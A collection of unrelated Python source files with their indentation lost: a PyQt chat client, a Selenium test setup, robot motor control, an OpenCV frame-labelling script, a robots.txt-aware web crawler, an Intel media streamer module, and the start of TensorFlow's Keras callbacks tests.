self.Name = QtWidgets.QLabel(main)
self.Name.setGeometry(QtCore.QRect(530, 90, 101, 16))
self.Name.setAlignment(QtCore.Qt.AlignCenter)
self.Name.setObjectName("Name")
self.retranslateUi(main, port, usrname)
self.sendButton.clicked.connect(self.sendMsg)
self.picsButton.clicked.connect(self.showPicsMenu)
self.fileButton.clicked.connect(self.showFileMenu)
QtCore.QMetaObject.connectSlotsByName(main)
def retranslateUi(self, main, port, usrname):
_translate = QtCore.QCoreApplication.translate
main.setWindowTitle(_translate("main", "Chat Room"))
self.sendButton.setText(_translate("main", "Send"))
self.chatMsg.setHtml(_translate("main", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Noto Serif SC\'; font-size:13pt; font-weight:496; font-style:normal;\">\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p></body></html>"))
self.chatMsg.setPlaceholderText(_translate("main", "Your History Msg HERE."))
self.inputMsg.setPlaceholderText(_translate("main", "Your Msg HERE."))
self.chatroomName.setText(_translate("main", port))
self.picsButton.setText(_translate("main", "Pics"))
self.fileButton.setText(_translate("main", "File"))
self.Name.setText(_translate("main", usrname))
def sendMsg(self):
# while 1:
# try:
# yourSentMsg = str(self.inputMsg.text())
# if yourSentMsg != 'exit()' and yourSentMsg != '':
# self.clientSocket.send(yourSentMsg.encode())
# else:
# self.clientSocket.close()
# break
# except ConnectionResetError:
# self.clientSocket.close()
# break
# os._exit(0)
try:
yourSentMsg = str(self.inputMsg.text())
if yourSentMsg != 'exit()':
self.clientSocket.send(yourSentMsg.encode())
self.inputMsg.setText('')
else:
self.clientSocket.close()
except ConnectionResetError:
self.clientSocket.close()
def recvMsg(self):
while 1:
try:
receivedMsg = self.clientSocket.recv(20480)
if receivedMsg.decode() != '':
print(receivedMsg.decode())
self.chatMsg.append(receivedMsg.decode())
self.chatMsg.moveCursor(-1)
if len(receivedMsg.decode()) > 5 and receivedMsg.decode()[-2] == 's' and receivedMsg.decode()[-1] == '!':
self.Name.setText(str(receivedMsg.decode()).split(' ')[0])
except ConnectionResetError:
self.clientSocket.close()
break
os._exit(0)
def showPicsMenu(self):
# QtWidgets.QMessageBox.information(self.picsButton, "pics", "pics")
imgName, imgType = QFileDialog.getOpenFileName(self, "打开图片", "", "*.jpg;;*.png;;All Files(*)")
print(imgName, imgType)
def showFileMenu(self):
# QtWidgets.QMessageBox.information(self.fileButton, "file", "file")
fileName, fileType = QFileDialog.getOpenFileName(self, "打开文件", "", "*.txt;;*.md;;All Files(*)") # ;;*.doc;;*.docx
fileContent = open(fileName, 'r').read()
onlyname = fileName.split('/')[-1]
file = '#################### - ' + onlyname + ' - ####################\n' + fileContent + '\n############################ - End - ############################'
self.inputMsg.setText(file)
print(fileName, fileType)
def __init__(self, serverPort, usrname):
super(Ui_main, self).__init__()
serverName = "localhost"
# serverPort = 9124
# serverPort = int(sys.argv[1])
port = "ChatRoom\n" + str(serverPort)
self.clientSocket = socket(AF_INET, SOCK_STREAM)
self.clientSocket.connect((serverName, serverPort))
self.setupUi(self, port, usrname)
self.retranslateUi(self, port, usrname)
print("The Client is READY to RECEIVE via TCP @", serverPort)
print(self.clientSocket)
threads = [threading.Thread(target=self.recvMsg), threading.Thread(target=self.sendMsg)]
for t in threads:
# self.chatMsg.moveToThread(t)
# self.inputMsg.moveToThread(t)
t.start()
self.show()
if __name__ == '__main__':
app = QApplication(sys.argv)
serverPort = int(sys.argv[1])
mainWindow = QMainWindow()
ui = Ui_main(serverPort, 'Your Name') # 这里的名字参考生成的py的类名
# ui.setupUi(mainWindow, 'ChatRoom')
# mainWindow.show()
sys.exit(app.exec_())
|
environment.py
|
import os
import threading
from wsgiref import simple_server
from wsgiref.simple_server import WSGIRequestHandler
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from app import app
# Use the chrome driver specific to your version of Chrome browser and put it in ./driver directory
CHROME_DRIVER = os.path.join(os.path.join(os.path.dirname(__file__), 'driver'), 'chromedriver')
chrome_options = Options()
# comment out the line below if you want to see the browser launch for tests
# possibly add time.sleep() if required
chrome_options.add_argument("--headless")
chrome_options.add_argument('--no-proxy-server')
chrome_options.add_argument("--proxy-server='direct://'")
chrome_options.add_argument("--proxy-bypass-list=*")
def before_all(context):
context.server = simple_server.WSGIServer(("", 5000), WSGIRequestHandler)
context.server.set_app(app)
context.pa_app = threading.Thread(target=context.server.serve_forever)
context.pa_app.start()
context.browser = webdriver.Chrome(options=chrome_options, executable_path=CHROME_DRIVER)
context.browser.set_page_load_timeout(time_to_wait=200)
def after_all(context):
context.browser.quit()
context.server.shutdown()
context.pa_app.join()
|
jetbot_control.py
|
import time
import threading # 引入threading
leftvalue = 0
rightvalue = 0
running = True
robot = ""
def control():
print("start running control mode")
while running:
print("is controlling")
global leftvalue
global rightvalue
#更改左右馬達速度
robot.set_motors(leftvalue,rightvalue)
print("當前速度: "+str(leftvalue)+","+str(rightvalue))
time.sleep(0.2)
robot.stop()
print("離開control")
#開始執行control模式
def start():
thread_1 = threading.Thread(target=control)
thread_1.start()
#設定開始及停止的設定函式
def setRunning(newRunning):
global running
running = newRunning
def getRunning():
global running
return running
#設定Robot
def setRobot(newRobot):
global robot
robot = newRobot
def setLeftValue(newLeftValue):
global leftvalue
leftvalue = newLeftValue
def setRightValue(newRightValue):
global rightvalue
rightvalue = newRightValue
|
sendtosocket.py
|
#!/usr/bin/env python3
# import rospy
import socket
from threading import Thread
import inputs
import struct
import time
# def send(conn):
# while True:
# conn.send('a')
# host1 = "10.5.5.9"
# port1 = 10000
# sock1 = socket.socket()
# sock1.connect((host1, port1))
# Thread(target=send, args=[sock1]).start()
send_socket = socket.socket() # Create the socket
send_socket.bind(("10.5.5.100",0))
send_socket.connect(('url', 0)) # Connect to the server
# send_socket.send(data) # Send the data to the server
|
multhread.py
|
import cv2 as cv
import numpy as np
import time
from timeit import repeat
from multiprocessing import Pool
import threading
backSub = cv.createBackgroundSubtractorMOG2()
# list to store clicked coordinates
coords = []
# cut the given frame and rect with np array of coords
def cut_image(frame, rect, pts):
x,y,w,h = rect
croped = frame[y:y+h, x:x+w].copy()
## (2) make mask
pts = pts - pts.min(axis=0)
mask = np.zeros(croped.shape[:2], np.uint8)
cv.drawContours(mask, [pts], -1, (255, 255, 255), -1, cv.LINE_AA)
## (3) do bit-op
dst = cv.bitwise_and(croped, croped, mask=mask)
return dst
def process(frames):
filee = open(r"labels.txt", "a")
for frame in frames:
blurred = cv.GaussianBlur(frame, (5, 5), 0)
fg = backSub.apply(blurred)
output = cv.connectedComponentsWithStats(fg, 4, cv.CV_32S)
(numLabels, labels, stats, centroids) = output
for i in range(0, numLabels):
x = stats[i, cv.CC_STAT_LEFT]
y = stats[i, cv.CC_STAT_TOP]
w = stats[i, cv.CC_STAT_WIDTH]
h = stats[i, cv.CC_STAT_HEIGHT]
area = stats[i, cv.CC_STAT_AREA]
label_text = "person" ' ' + str(x) + ' ' + str(y) + ' ' + str(w) + ' ' + str(h) + '\n'
if area > 400 and area < 1000:
filee.write(label_text)
if __name__=="__main__":
capture = cv.VideoCapture(cv.samples.findFileOrKeep("right_sample2.mov"))
coords = [(931,318),( 0,366), (223,974), (1905,577)]
points = np.asarray(coords)
shape = cv.boundingRect(points)
if not capture.isOpened():
print('Unable to open: ')
exit(0)
# store all frames in a list
frames = []
print('reading frames...')
start_read = time.time()
while True:
ret, frame = capture.read()
if frame is None:
break
image = cut_image(frame, shape, points)
frames.append(image)
end_read = time.time()
print('processing frames...')
# make 5 chunks
chunks = [frames[i::5] for i in range(5)]
tasks = []
start_process = time.time()
for chunk in chunks:
tasks.append(threading.Thread(target=process, args=(chunk,)))
tasks[-1].start()
for task in tasks:
task.join()
end_process = time.time()
print('read time: ', end_read-start_read)
print('process time: ', end_process-start_process)
|
crawler.py
|
from bottle import Bottle, view, request, redirect
from wtforms import Form, StringField, IntegerField, BooleanField, validators
import urllib.request
from model import Base, Page, Relation
import urllib.request
import urllib.parse
import urllib.robotparser
from bs4 import BeautifulSoup
from queue import Queue
import threading
import time
import gzip
crawler_app = Bottle()
from model import session, engine
class CrawlerFormProcessor(Form):
url = StringField('URL', [validators.URL(require_tld=False, message="Must be valid URL")], default="http://",
render_kw={"placeholder": "https://example.com"})
depth = IntegerField('Max depth', [validators.NumberRange(min=1, message="Must be > 0")], default=3)
threads = IntegerField('Threads', [validators.NumberRange(min=1, message="Must be > 0")], default=16)
max_pages = IntegerField('Maximum pages', [validators.NumberRange(min=0, message="Must be 0 or positive")], default=500)
uel = BooleanField('Include external links')
db_lock = threading.Lock()
def is_ascii(s):
return all(ord(c) < 128 for c in s)
def fix_non_ascii (wb):
# fix website link
url = wb
url = urllib.parse.urlsplit(url)
url = list(url)
for i in range(1, 5):
url[i] = urllib.parse.quote(url[i])
wb = urllib.parse.urlunsplit(url)
return wb
def add_page_with_text_to_database(page, text):
with db_lock:
try:
q = session.query(Page).filter(Page.url == page).scalar()
if q is not None:
q.text = text
session.commit()
except:
#ignore error
raise
def add_page_pair_to_database(from_page, to_page, limit):
with db_lock:
cou = session.query(Page.id).filter(Page.url == from_page).scalar()
cou1 = session.query(Page.id).filter(Page.url == to_page).scalar()
if cou is None:
new_page_from = Page(url=from_page, text="", rank=0)
session.add(new_page_from)
session.flush()
id0 = new_page_from.id
else:
id0 = cou
if cou1 is None:
allowed = limit < 1 or limit > session.query(Page).count()
if not allowed:
return
new_page_to = Page(url=to_page, text="", rank=0)
session.add(new_page_to)
session.flush()
id1 = new_page_to.id
else:
id1 = cou1
new_relation = Relation(page_id = id0, destination_id = id1)
# print(new_relation.page_id.id)
session.add(new_relation)
session.commit()
# print('Added to "relation" db: ', i.id, i1.id)
class Crawler:
def __init__(self, website, depth=3, pages_limit=0, threads_number=16, remove_external_links=True):
# settings
self.website = self.make_requestable_link(website)
if not is_ascii(self.website):
self.website = fix_non_ascii(self.website)
self.depth = depth
self.pages_limit = pages_limit
self.threads_number = threads_number
self.remove_external_links = remove_external_links
self.base = self.make_base(self.website)
print("Crawler initialized!")
print("Website = ", self.website)
print("Depth = ", self.depth)
print("Pages_limit = ", self.pages_limit)
print("Threads_number = ", self.threads_number)
print("Base = ", self.base)
print("External removed = ", self.remove_external_links)
# threading
self.q = Queue()
self.processed_lock = threading.Lock()
self.pages_counter_lock = threading.Lock()
# processing
self.processed = set()
self.robot_parser = urllib.robotparser.RobotFileParser()
self.current_pages_processed = 1
# output
self.dictionary = {}
@classmethod
def make_requestable_link(cls, website):
# add 'http' to the link if needed
if website.find("http://") != 0 and website.find("https://") != 0:
website = "http://" + website
return website
@classmethod
def make_base(cls, website):
# domain base
if website.find("https") == 0:
temp_base = website[8:]
else:
temp_base = website[7:]
slash_pos = temp_base.find('/')
if slash_pos != -1:
temp_base = temp_base[:slash_pos]
temp_base = ".".join(temp_base.split(".")[-2:])
return temp_base
def get_outlinks(self, wb):
# init resulting set
results = set()
#fix link if needed
if not is_ascii(wb):
wb = fix_non_ascii(wb)
request = urllib.request.Request(
wb,
headers={
"Accept-Encoding": "gzip"
})
# get header and content
gzip_ = False
try:
with urllib.request.urlopen(request, timeout=15) as url:
info = url.info()
if info["Content-Encoding"] == "gzip":
gzip_ = True
except IOError as e:
print("Couldn't get info for url", wb, e)
return set()
# discard non-html
if info is None:
return set()
if info['Content-Type'].find("html") == -1:
print("Error : It's not an html page!", wb)
return set()
# get header and content
try:
with urllib.request.urlopen(request, timeout=15) as url:
if not gzip_:
page = url.read()
else:
page = gzip.decompress(url.read())
# print("Decompressed")
except IOError:
print("Couldn't open url", wb)
return set()
# prepare soup
soup = BeautifulSoup(page, "html.parser")
# http://stackoverflow.com/a/24618186
for script in soup(["script", "style"]):
script.extract() # rip it out
text = soup.get_text()
# break into lines and remove leading and trailing space on each
lines = (line.strip() for line in text.splitlines())
# break multi-headlines into a line each
chunks = (phrase.strip() for line in lines for phrase in line.split(" "))
# drop blank lines
text = '\n'.join(chunk for chunk in chunks if chunk)
add_page_with_text_to_database(wb, text)
# prepare soup
# soup = BeautifulSoup(page, "html.parser")
for link in soup.find_all('a'):
temp = link.get('href')
# skip empty
if temp is None:
continue
if len(temp) == 0:
continue
if temp.isspace():
continue
if temp == "?":
continue
# fix relative links
temp = urllib.parse.urljoin(wb, temp)
# throw away anchors
if temp[0] == '#':
continue
# cut anchors from urls at the end
if temp.rfind('#') != -1:
temp = temp[:temp.rfind('#')]
# throwaway javascript: , mailto: and anything like them
if temp[:4] != "http":
continue
if self.remove_external_links:
base_pos = temp.find(self.base)
sl = temp[8:].find("/") + 8
# print("For", temp, "base_pos =", base_pos, "sl =", sl)
if base_pos == -1 or (sl != -1 and sl < base_pos):
continue
if temp[base_pos-1] != ".":
continue
# print("Adding", temp)
if not is_ascii(temp):
temp = fix_non_ascii(temp)
results.add(temp)
return results
def worker(self):
debug = True
while True:
# get task from queue
current = self.q.get()
# are we done yet?
if current is None:
break
current_depth = current[0]
current_url = current[1]
new_depth = current_depth + 1
# check if it has not been taken
with self.processed_lock:
if debug:
print(threading.current_thread().name, "requests", current_depth, current_url)
self.processed.add(current_url)
# should we go below that depth?
# if current_depth > self.depth:
# print("Break because of depth")
# break
# do the work
res = self.get_outlinks(current_url)
# add new links to the queue
if new_depth <= self.depth:
for i in res:
add_page_pair_to_database(current_url, i, self.pages_limit)
with self.processed_lock:
for item in res:
if self.robot_parser.can_fetch("*", item):
if item not in self.processed:
should_insert = True
for i in list(self.q.queue):
if item == i[1]:
should_insert = False
break
if should_insert and \
(self.current_pages_processed < self.pages_limit or self.pages_limit == 0):
self.q.put((new_depth, item))
self.current_pages_processed += 1
else:
print(threading.current_thread().name, "Restricted by robots.txt", item)
self.q.task_done()
print(threading.current_thread().name, "is done. Bye-bye")
def start_crawler(self):
start = time.time()
# read robots.txt
tmp = "http://" + self.base + "/robots.txt"
self.robot_parser.set_url(tmp)
self.robot_parser.read()
# put first link
self.q.put((0, self.website))
new_page = Page(url=self.website, text="", rank=0)
session.add(new_page)
session.commit()
threads = []
for x in range(self.threads_number):
t = threading.Thread(target=self.worker)
t.daemon = True
threads.append(t)
t.start()
# wait until the queue becomes empty
self.q.join()
# join threads
for i in range(self.threads_number):
self.q.put(None)
for t in threads:
t.join()
session.commit()
# empty the queue
self.q.queue.clear()
end = time.time()
print("With", self.threads_number, "threads elapsed : ", end - start)
print("Total number of pages processed :", self.current_pages_processed)
@crawler_app.get('/crawler')
@crawler_app.post('/crawler')
@view('crawler')
def crawler():
form = CrawlerFormProcessor(request.forms.decode())
if request.method == 'POST' and form.validate():
session.commit()
Base.metadata.drop_all(engine)
Base.metadata.create_all(engine)
crawl = Crawler(website=form.url.data,
depth=form.depth.data,
pages_limit=form.max_pages.data,
threads_number=form.threads.data,
remove_external_links=not form.uel.data )
crawl.start_crawler()
session.commit()
print("Finish: " + form.url.data)
redirect("/pages")
return locals()
|
streamer.py
|
# INTEL CONFIDENTIAL
#
# Copyright (C) 2021 Intel Corporation
#
# This software and the related documents are Intel copyrighted materials, and
# your use of them is governed by the express license under which they were provided to
# you ("License"). Unless the License provides otherwise, you may not use, modify, copy,
# publish, distribute, disclose or transmit this software or the related documents
# without Intel's prior written permission.
#
# This software and the related documents are provided as is,
# with no express or implied warranties, other than those that are expressly stated
# in the License.
import abc
import multiprocessing
import queue
import sys
from enum import Enum
from pathlib import Path
from typing import Iterable, Iterator, List, NamedTuple, Optional, Tuple, Union
import cv2
import numpy as np
from natsort import natsorted
class MediaType(Enum):
image = 1
video = 2
camera = 3
class MediaExtensions(NamedTuple):
image: Tuple[str, ...]
video: Tuple[str, ...]
MEDIA_EXTENSIONS = MediaExtensions(
image=(".jpg", ".jpeg", ".png", ".ppm", ".bmp", ".pgm", ".tif", ".tiff", ".webp"),
video=(".avi", ".mp4"),
)
def _get_media_type(path: Optional[Union[str, Path]]) -> MediaType:
"""
Get Media Type from the input path.
:param path: Path to file or directory.
Could be None, which implies camera media type.
"""
if isinstance(path, str):
path = Path(path)
media_type: MediaType
if path is None:
media_type = MediaType.camera
elif path.is_dir():
if _get_filenames(path, MediaType.image):
media_type = MediaType.image
elif path.is_file():
if _is_file_with_supported_extensions(path, _get_extensions(MediaType.image)):
media_type = MediaType.image
elif _is_file_with_supported_extensions(path, _get_extensions(MediaType.video)):
media_type = MediaType.video
else:
raise ValueError("File extension not supported.")
else:
raise ValueError("File or folder does not exist")
return media_type
def _get_extensions(media_type: MediaType) -> Tuple[str, ...]:
"""
Get extensions of the input media type.
:param media_type: Type of the media. Either image or video.
:return: Supported extensions for the corresponding media type.
:example:
>>> _get_extensions(media_type=MediaType.image)
('.jpg', '.jpeg', '.png', '.ppm', '.bmp', '.pgm', '.tif', '.tiff', '.webp')
>>> _get_extensions(media_type=MediaType.video)
('.avi', '.mp4')
"""
return getattr(MEDIA_EXTENSIONS, media_type.name)
def _is_file_with_supported_extensions(path: Path, extensions: Tuple[str, ...]) -> bool:
"""
Check if the file is supported for the media type
:param path: File path to check
:param extensions: Supported extensions for the media type
:example:
>>> from pathlib import Path
>>> path = Path("./demo.mp4")
>>> extensions = _get_extensions(media_type=MediaType.video)
>>> _is_file_with_supported_extensions(path, extensions)
True
>>> path = Path("demo.jpg")
>>> extensions = _get_extensions(media_type=MediaType.image)
>>> _is_file_with_supported_extensions(path, extensions)
True
>>> path = Path("demo.mp3")
>>> extensions = _get_extensions(media_type=MediaType.image)
>>> _is_file_with_supported_extensions(path, extensions)
False
"""
return path.suffix.lower() in extensions
def _get_filenames(path: Union[str, Path], media_type: MediaType) -> List[str]:
"""
Get filenames from a directory or a path to a file.
:param path: Path to the file or to the location that contains files.
:param media_type: Type of the media (image or video)
:example:
>>> path = "../images"
>>> _get_filenames(path, media_type=MediaType.image)
['images/4.jpeg', 'images/1.jpeg', 'images/5.jpeg', 'images/3.jpeg', 'images/2.jpeg']
"""
extensions = _get_extensions(media_type)
filenames: List[str] = []
if media_type == MediaType.camera:
raise ValueError(
"Cannot get filenames for camera. Only image and video files are supported."
)
if isinstance(path, str):
path = Path(path)
if path.is_file():
if _is_file_with_supported_extensions(path, extensions):
filenames = [path.as_posix()]
else:
raise ValueError("Extension not supported for media type")
if path.is_dir():
for filename in path.rglob("*"):
if _is_file_with_supported_extensions(filename, extensions):
filenames.append(filename.as_posix())
filenames = natsorted(filenames) # type: ignore[assignment]
if len(filenames) == 0:
raise FileNotFoundError(f"No {media_type.name} file found in {path}!")
return filenames
def _read_video_stream(stream: cv2.VideoCapture) -> Iterator[np.ndarray]:
"""
Read video and yield the frame.
:param stream: Video stream captured via OpenCV's VideoCapture
:return: Individual frame
"""
while True:
frame_available, frame = stream.read()
if not frame_available:
break
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
yield frame
stream.release()
class BaseStreamer(metaclass=abc.ABCMeta):
"""
Base Streamer interface to implement Image, Video and Camera streamers.
"""
@abc.abstractmethod
def get_stream(self, stream_input):
"""
Get the streamer object, depending on the media type.
:param stream_input: Path to the stream or
camera device index in case to capture from camera.
:return: Streamer object.
"""
raise NotImplementedError
@abc.abstractmethod
def __iter__(self) -> Iterator[np.ndarray]:
"""
Iterate through the streamer object that is a Python Generator object.
:return: Yield the image or video frame.
"""
raise NotImplementedError
def _process_run(streamer: BaseStreamer, buffer: multiprocessing.Queue):
"""
Private function that is run by the thread.
Waits for the buffer to gain space for timeout seconds while it is full.
If no space was available within this time the function will exit
:param streamer: The streamer to retrieve frames from
:param buffer: The buffer to place the retrieved frames in
"""
for frame in streamer:
buffer.put(frame)
class ThreadedStreamer(BaseStreamer):
"""
Runs a BaseStreamer on a seperate thread.
:param streamer: The streamer to run on a thread
:param buffer_size: Number of frame to buffer internally
:example:
>>> streamer = VideoStreamer(path="../demo.mp4")
>>> threaded_streamer = ThreadedStreamer(streamer)
... for frame in threaded_streamer:
... pass
"""
def __init__(self, streamer: BaseStreamer, buffer_size: int = 2):
self.buffer_size = buffer_size
self.streamer = streamer
def get_stream(self, _=None) -> BaseStreamer:
return self.streamer
def __iter__(self) -> Iterator[np.ndarray]:
buffer: multiprocessing.Queue = multiprocessing.Queue(maxsize=self.buffer_size)
process = multiprocessing.Process(
target=_process_run, args=(self.get_stream(), buffer)
)
# Make thread a daemon so that it will exit when the main program exits as well
process.daemon = True
process.start()
try:
while process.is_alive() or not buffer.empty():
try:
yield buffer.get(timeout=0.1)
except queue.Empty:
pass
except GeneratorExit:
process.terminate()
finally:
process.join(timeout=0.1)
# The kill() function is only available in Python 3.7.
# Skip it if running an older Python version.
if sys.version_info >= (3, 7) and process.exitcode is None:
process.kill()
class VideoStreamer(BaseStreamer):
"""
Video Streamer
:param path: Path to the video file or directory.
:example:
>>> streamer = VideoStreamer(path="../demo.mp4")
... for frame in streamer:
... pass
"""
def __init__(self, path: str) -> None:
self.media_type = MediaType.video
self.filenames = _get_filenames(path, media_type=MediaType.video)
def get_stream(self, stream_input: str) -> cv2.VideoCapture:
return cv2.VideoCapture(stream_input)
def __iter__(self) -> Iterator[np.ndarray]:
for filename in self.filenames:
stream = self.get_stream(stream_input=filename)
yield from _read_video_stream(stream)
class CameraStreamer(BaseStreamer):
"""
Stream video frames from camera
:param camera_device: Camera device index e.g, 0, 1
:example:
>>> streamer = CameraStreamer(camera_device=0)
... for frame in streamer:
... cv2.imshow("Window", frame)
... if ord("q") == cv2.waitKey(1):
... break
"""
def __init__(self, camera_device: Optional[int] = None):
self.media_type = MediaType.camera
self.camera_device = 0 if camera_device is None else camera_device
def get_stream(self, stream_input: int):
return cv2.VideoCapture(stream_input)
def __iter__(self) -> Iterator[np.ndarray]:
stream = self.get_stream(stream_input=self.camera_device)
yield from _read_video_stream(stream)
class ImageStreamer(BaseStreamer):
"""
Stream from image file or directory.
:param path: Path to an image or directory.
:example:
>>> streamer = ImageStreamer(path="../images")
... for frame in streamer:
... cv2.imshow("Window", frame)
... cv2.waitKey(0)
"""
def __init__(self, path: str) -> None:
self.media_type = MediaType.image
self.filenames = _get_filenames(path=path, media_type=MediaType.image)
@staticmethod
def get_stream(stream_input: str) -> Iterable[np.ndarray]:
image = cv2.imread(stream_input)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
yield image
def __iter__(self) -> Iterator[np.ndarray]:
for filename in self.filenames:
yield from self.get_stream(stream_input=filename)
def get_streamer(
path: Optional[str] = None,
camera_device: Optional[int] = None,
threaded: bool = False,
) -> BaseStreamer:
"""
Get streamer object based on the file path or camera device index provided.
:param path: Path to file or directory.
:param camera_device: Camera device index.
:param threaded: Threaded streaming option
"""
if path is not None and camera_device is not None:
raise ValueError(
"Both path and camera device is provided. Choose either camera or path to a image/video file."
)
media_type = _get_media_type(path)
streamer: BaseStreamer
if path is not None and media_type == MediaType.image:
streamer = ImageStreamer(path)
elif path is not None and media_type == MediaType.video:
streamer = VideoStreamer(path)
elif media_type == MediaType.camera:
if camera_device is None:
camera_device = 0
streamer = CameraStreamer(camera_device)
else:
raise ValueError("Unknown media type")
if threaded:
streamer = ThreadedStreamer(streamer)
return streamer
|
callbacks_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras callbacks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import csv
import os
import re
import shutil
import sys
import threading
import unittest
from absl.testing import parameterized
import numpy as np
from tensorflow.python import keras
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.framework import random_seed
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import summary_iterator
from tensorflow.python.training import adam
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
try:
import requests # pylint:disable=g-import-not-at-top
except ImportError:
requests = None
TRAIN_SAMPLES = 10
TEST_SAMPLES = 10
NUM_CLASSES = 2
INPUT_DIM = 3
NUM_HIDDEN = 5
BATCH_SIZE = 5
class Counter(keras.callbacks.Callback):
"""Counts the number of times each callback method was run.
Attributes:
method_counts: dict. Contains the counts of time each callback method was
run.
"""
def __init__(self):
self.method_counts = collections.defaultdict(int)
methods_to_count = [
'on_batch_begin', 'on_batch_end', 'on_epoch_begin', 'on_epoch_end',
'on_predict_batch_begin', 'on_predict_batch_end', 'on_predict_begin',
'on_predict_end', 'on_test_batch_begin', 'on_test_batch_end',
'on_test_begin', 'on_test_end', 'on_train_batch_begin',
'on_train_batch_end', 'on_train_begin', 'on_train_end'
]
for method_name in methods_to_count:
setattr(self, method_name,
self.wrap_with_counts(method_name, getattr(self, method_name)))
def wrap_with_counts(self, method_name, method):
def _call_and_count(*args, **kwargs):
self.method_counts[method_name] += 1
return method(*args, **kwargs)
return _call_and_count
def _get_numpy():
return np.ones((10, 10)), np.ones((10, 1))
def _get_sequence():
class MySequence(keras.utils.data_utils.Sequence):
def __getitem__(self, _):
return np.ones((2, 10)), np.ones((2, 1))
def __len__(self):
return 5
return MySequence(), None
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
class CallbackCountsTest(keras_parameterized.TestCase):
def _check_counts(self, counter, expected_counts):
"""Checks that the counts registered by `counter` are those expected."""
for method_name, expected_count in expected_counts.items():
self.assertEqual(
counter.method_counts[method_name],
expected_count,
msg='For method {}: expected {}, got: {}'.format(
method_name, expected_count, counter.method_counts[method_name]))
def _get_model(self):
layers = [
keras.layers.Dense(10, activation='relu'),
keras.layers.Dense(1, activation='sigmoid')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
adam.AdamOptimizer(0.001),
'binary_crossentropy',
run_eagerly=testing_utils.should_run_eagerly())
return model
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_fit(self, data):
x, y = data
val_x, val_y = np.ones((4, 10)), np.ones((4, 1))
model = self._get_model()
counter = Counter()
model.fit(
x,
y,
validation_data=(val_x, val_y),
batch_size=2,
epochs=5,
callbacks=[counter])
self._check_counts(
counter, {
'on_batch_begin': 25,
'on_batch_end': 25,
'on_epoch_begin': 5,
'on_epoch_end': 5,
'on_predict_batch_begin': 0,
'on_predict_batch_end': 0,
'on_predict_begin': 0,
'on_predict_end': 0,
'on_test_batch_begin': 10,
'on_test_batch_end': 10,
'on_test_begin': 5,
'on_test_end': 5,
'on_train_batch_begin': 25,
'on_train_batch_end': 25,
'on_train_begin': 1,
'on_train_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_evaluate(self, data):
x, y = data
model = self._get_model()
counter = Counter()
model.evaluate(x, y, batch_size=2, callbacks=[counter])
self._check_counts(
counter, {
'on_test_batch_begin': 5,
'on_test_batch_end': 5,
'on_test_begin': 1,
'on_test_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_predict(self, data):
x = data[0]
model = self._get_model()
counter = Counter()
model.predict(x, batch_size=2, callbacks=[counter])
self._check_counts(
counter, {
'on_predict_batch_begin': 5,
'on_predict_batch_end': 5,
'on_predict_begin': 1,
'on_predict_end': 1
})
def test_callback_list_methods(self):
counter = Counter()
callback_list = keras.callbacks.CallbackList([counter])
batch = 0
callback_list.on_test_batch_begin(batch)
callback_list.on_test_batch_end(batch)
callback_list.on_predict_batch_begin(batch)
callback_list.on_predict_batch_end(batch)
self._check_counts(
counter, {
'on_test_batch_begin': 1,
'on_test_batch_end': 1,
'on_predict_batch_begin': 1,
'on_predict_batch_end': 1
})
class KerasCallbacksTest(keras_parameterized.TestCase):
def _get_model(self, input_shape=None):
layers = [
keras.layers.Dense(3, activation='relu'),
keras.layers.Dense(2, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=input_shape)
model.compile(
loss='mse',
optimizer='rmsprop',
metrics=[keras.metrics.CategoricalAccuracy(name='my_acc')],
run_eagerly=testing_utils.should_run_eagerly())
return model
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging(self):
model = self._get_model(input_shape=(3,))
x = array_ops.ones((50, 3))
y = array_ops.zeros((50, 2))
dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types(exclude_models='functional')
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_deferred_model_build(self):
model = self._get_model()
self.assertFalse(model.built)
x = array_ops.ones((50, 3))
y = array_ops.zeros((50, 2))
dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegexpMatches(printed.contents(), expected_log)
